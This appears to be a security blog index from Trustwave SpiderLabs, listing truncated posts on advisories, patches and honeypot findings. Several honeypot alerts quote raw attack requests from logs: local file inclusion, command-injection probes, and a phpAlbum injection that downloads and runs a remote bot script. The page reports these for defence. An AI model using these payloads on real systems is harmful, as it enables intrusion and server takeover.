
TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin

The SpiderLabs team at Trustwave published a new advisory for a Cross-Site Scripting (XSS) vulnerability found in phpMyAdmin 3.4.8 and previous versions. phpMyAdmin is an open source tool developed in PHP to manage and administer MySQL databases remotely. The vulnerability was discovered...

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations.
Focus on Local File Inclusion attacks
Here are some of the LFI attack payloads identified today:
GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1
GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1
GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1
GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs:
GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1
GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1
GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0
GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
GET...

Mobile Device Location Tracking, and Why It Matters

Throughout the past decade, there has been a substantial increase in mobile device usage. From smartphones to tablets, most individuals possess at least one. More and more people now have ready access to a substantial amount of data through mobile...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected
Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs:
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

Microsoft Patch Tuesday, December 2011

This Patch Tuesday, there are 3 new Critical and 10 new Important Bulletins. With this many high-urgency bulletins, it's tough to get a handle on which ones to tackle first. Of course, "all of them" is the standard answer, but...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components.

[Honeypot Alert] Mass Joomla Component LFI Attacks Identified

Joomla Component LFI Vulnerabilities
Joomla has hundreds of Controller components. Check out the Joomla Extension site for examples. Unfortunately, the vast majority of these components have LFI vulnerabilities. The vulnerability details are pretty much the same - The vulnerable page...

[Honeypot Alert] WordPress Timthumb Attacks Rising

SpiderLabs Research Team has been tracking an increase in WordPress Timthumb plug-in scanning.
How widespread are the attacks?
We just added the following entry to the Web Hacking Incident Database (WHID) - WHID 2011-262: Hackers 'Timthumb' Their Noses At...

Trustwave Protections Deployed: MS11-083

Last week, it was Microsoft's Patch Tuesday! For November, Microsoft released one "critical" bulletin, two "important," and one "moderate." The most critical is MS11-083 (CVE-2011-2013), which indicates a flaw in the TCP/IP implementation that possibly allows remote code execution by an...

Trustwave Protections Deployed: Duqu

Recent reports of the zero-day exploit found in the Win32k TrueType font parsing engine, and indications that Duqu is using this attack vector for infection, can be quite concerning, especially if your systems are at risk. For those who...

NickiSpy.C - Android Malware Analysis & Demo

Recently I got the chance to dig into a nice little piece of Android spyware, commonly known as 'NickiSpy.C'. I've also seen it referred to as NickiBot, as well as NickiSpy.A and NickySpy.B. Some anti-virus companies even refer to it...